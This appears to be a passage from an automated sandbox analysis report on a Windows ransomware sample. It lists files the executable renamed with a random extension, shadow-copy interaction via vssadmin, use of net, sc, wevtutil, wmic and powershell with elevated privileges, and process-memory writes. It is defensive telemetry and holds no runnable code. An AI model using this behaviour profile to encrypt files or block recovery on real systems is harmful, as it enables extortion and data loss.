File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\feature.properties.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_shAMFEMgwT80.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\WATER\THMBNAIL.PNG.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_oahjWh0W5XI0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\plugin.jar.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_M8XkCRnD5WY0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\System\msadc\fr-FR\msadcer.dll.mui C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21421_.GIF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_g9rixWu2cG80.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\CollectSignatures_Init.xsn.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_KYVLwIVd6Kw0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationUp_ButtonGraphic.png C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_LinkNoDrop32x32.gif.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_mdM9cGavobQ0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\MCIMPP.mpp.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_INkUS0-cPBY0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR2F.GIF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_RfLNRchu-OI0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.nl_zh_4.4.0.v20140623020002.jar.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_SGT8URzAQBA0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\orb.idl.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_497_upyDxr80.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-text.xml.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_yzv7fGQeusc0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\STRTEDGE\STRTEDGE.ELM.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_nJFdfIuywj40.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core_0.10.100.v20140424-2042.jar.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_sxbAxYEGbIk0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SPRING\THMBNAIL.PNG.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_gh7HKWwFaCc0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TN00687_.WMF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_7nYtHetx2wE0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR39F.GIF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_8cOWmM0P3fE0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\MANIFEST.MF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_v-Dji1ArOpY0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0315447.JPG.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_6TOpSANo4tQ0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Garden.jpg C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00391_.WMF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_qxjzNKqX7eM0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00917_.WMF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_ggDLiAovPcM0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME54.CSS.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_IGgRsQMT1b40.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\userContent_16x9_imagemask.png C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\visualvm.conf.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_s4ScfK4JFks0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\UnlockClose.wdp.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_K-QvJQ8ZjFM0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\nl.txt.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_A3dzxAxRhvc0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Windows Media Player\Media Renderer\DMR_48.jpg C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_mwdAM9IcPIA0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Services\verisign.bmp.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_nwBcysLdQJo0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0200273.WMF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_ldJSXuI5Szc0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\GrayCheck\TAB_OFF.GIF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_C5Mmz3yuyNY0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Madeira.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_-2pyxKznThM0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\settings.html C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationLeft_ButtonGraphic.png C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Omsk.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_wU5YPL8KIgU0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Windows Media Player\de-DE\setup_wm.exe.mui C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_corner_bottom_left.png C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\1047x576black.png C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18218_.WMF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_uwsrTcepxOs0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Rothera.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_m45q3VgObc80.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\css\weather.css C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine.nl_ja_4.4.0.v20140623020002.jar.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_3roULLG0Q-o0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\MP00021_.WMF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_Liwi_NnikTc0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\hwresmlm.dat C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationRight_ButtonGraphic.png C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00297_.WMF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_fIVVazX-qVc0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0239943.WMF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_hWR8tHXnklg0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PARNT_01.MID.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_vw1BQm7TVVA0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\en.ttt.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_xhxn1-Xw-8k0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\th.txt.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_okdJzt01E140.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\dialdot_lrg.png C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ro.txt.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_QSxGsNbzmGs0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-previous-static.png C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\eclipse.inf.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_GEJMpGZaN-00.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861258748.profile.gz.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_NwJQOh75ixA0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-ui_zh_CN.jar.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_DijtvB6KpR80.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\vlm.html.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_ORU5jAhnJRQ0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\telnet.luac.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_GPy6rxBomDk0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\System\Ole DB\de-DE\msdasqlr.dll.mui C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10254_.GIF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_-wMe8YHV2fM0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1928 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1928 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1928 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1984 wrote to memory of 524 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1984 wrote to memory of 524 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1984 wrote to memory of 524 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1928 wrote to memory of 472 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1928 wrote to memory of 472 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1928 wrote to memory of 472 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 472 wrote to memory of 1416 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 472 wrote to memory of 1416 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 472 wrote to memory of 1416 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1928 wrote to memory of 1464 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1928 wrote to memory of 1464 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1928 wrote to memory of 1464 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1464 wrote to memory of 1396 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1464 wrote to memory of 1396 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1464 wrote to memory of 1396 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1928 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1928 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1928 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 540 wrote to memory of 1752 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 540 wrote to memory of 1752 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 540 wrote to memory of 1752 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1928 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1928 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1928 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1508 wrote to memory of 620 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1508 wrote to memory of 620 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1508 wrote to memory of 620 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1928 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1928 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1928 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 2028 wrote to memory of 2044 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2028 wrote to memory of 2044 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2028 wrote to memory of 2044 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1928 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1928 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1928 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1048 wrote to memory of 1968 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1048 wrote to memory of 1968 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1048 wrote to memory of 1968 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1928 wrote to memory of 1084 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1928 wrote to memory of 1084 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1928 wrote to memory of 1084 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
